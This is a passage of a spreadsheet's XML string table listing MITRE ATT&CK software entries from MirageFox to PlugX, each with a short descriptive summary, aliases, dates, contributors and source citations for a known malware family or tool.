    <t>S0280</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0280</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0084</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0083</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0080</t>
  </si>
  <si>
    <t>25 March 2020</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0079</t>
  </si>
  <si>
    <t>S0553</t>
  </si>
  <si>
    <t>MoleNet</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0553</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0149</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0284</t>
  </si>
  <si>
    <t>3.0</t>
  </si>
  <si>
    <t>SKID, SpicyOmelette, Terra Loader</t>
  </si>
  <si>
    <t>Drew Church, Splunk</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>Mosquito</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0256</t>
  </si>
  <si>
    <t>S0590</t>
  </si>
  <si>
    <t>NBTscan</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0590</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0272</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0034</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017) (Citation: McAfee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0198</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0353</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0205</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>NanHaiShu</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0228</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0336</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0247</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0210</t>
  </si>
  <si>
    <t>S0039</t>
  </si>
  <si>
    <t>Net</t>
  </si>
  <si>
    <t>The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)
[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as &lt;code&gt;net1 user&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0039</t>
  </si>
  <si>
    <t>net.exe</t>
  </si>
  <si>
    <t>David Ferguson, CyberSponse</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0056</t>
  </si>
  <si>
    <t>NetC</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0033</t>
  </si>
  <si>
    <t>S0457</t>
  </si>
  <si>
    <t>Netwalker</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0457</t>
  </si>
  <si>
    <t>S0508</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0508</t>
  </si>
  <si>
    <t>15 September 2020</t>
  </si>
  <si>
    <t>29 September 2020</t>
  </si>
  <si>
    <t>Janantha Marasinghe</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0118</t>
  </si>
  <si>
    <t>Backdoor.Nidiran</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0359</t>
  </si>
  <si>
    <t>14 February 2019</t>
  </si>
  <si>
    <t>22 April 2019</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0368</t>
  </si>
  <si>
    <t>26 March 2019</t>
  </si>
  <si>
    <t>Diskcoder.C, ExPetr, GoldenEye, Nyetya, Petrwrap</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0138</t>
  </si>
  <si>
    <t>Sasfis</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0165</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0402</t>
  </si>
  <si>
    <t>29 August 2019</t>
  </si>
  <si>
    <t>Crossrider</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0352</t>
  </si>
  <si>
    <t>Backdoor.MacOS.OCEANLOTUS.F</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0346</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0340</t>
  </si>
  <si>
    <t>S0439</t>
  </si>
  <si>
    <t>Okrum</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0439</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0365</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0052</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0264</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0229</t>
  </si>
  <si>
    <t>AIRBREAK</t>
  </si>
  <si>
    <t>S0594</t>
  </si>
  <si>
    <t>Out1</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0594</t>
  </si>
  <si>
    <t>19 March 2021</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0072</t>
  </si>
  <si>
    <t>S0598</t>
  </si>
  <si>
    <t>P.A.S. Webshell</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0598</t>
  </si>
  <si>
    <t>Fobushell</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>P2P ZeuS</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0016</t>
  </si>
  <si>
    <t>Gameover ZeuS, Peer-to-Peer ZeuS</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0158</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0254</t>
  </si>
  <si>
    <t>S0435</t>
  </si>
  <si>
    <t>PLEAD</t>
  </si>
  <si>
    <t xml:space="preserve">[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0435</t>
  </si>
  <si>
    <t>04 July 2020</t>
  </si>
  <si>
    <t>Tatsuya Daitoku, Cyber Defense Institute, Inc.</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0216</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0150</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0145</t>
  </si>
  <si>
    <t>DNSMessenger</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0223</t>
  </si>
  <si>
    <t>Powermud</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0371</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0184</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0196</t>
  </si>
  <si>
    <t>ShellTea</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0197</t>
  </si>
  <si>
    <t>PSVC</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0208</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0122</t>
  </si>
  <si>
    <t>S0556</t>
  </si>
  <si>
    <t>Pay2Key</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0556</t>
  </si>
  <si>
    <t>04 January 2021</t>
  </si>
  <si>
    <t>S0587</t>
  </si>
  <si>
    <t>Penquin</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0587</t>
  </si>
  <si>
    <t>11 March 2021</t>
  </si>
  <si>
    <t>Penquin 2.0, Penquin_x64</t>
  </si>
  <si>
    <t>Antonio Villani, @LDO_CyberSec, Leonardo's Cyber Security Division; Nino Verde, @LDO_CyberSec, Leonardo's Cyber Security Division; Silvio La Porta, @LDO_CyberSec, Leonardo's Cyber Security Division</t>
  </si>
  <si>
    <t>S0517</t>
  </si>
  <si>
    <t>Pillowmint</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0517</t>
  </si>
  <si>
    <t>27 July 2020</t>
  </si>
  <si>
    <t>06 October 2020</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0048</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0097</t>
  </si>
  <si>
    <t>S0501</t>
  </si>
  <si>
    <t>PipeMon</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0501</t>
  </si>
  <si>
    <t>24 August 2020</t>
  </si>
  <si>
    <t>Martin Smolár, ESET; Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
    <t>Pisloader</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0124</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)</t>
  </si>
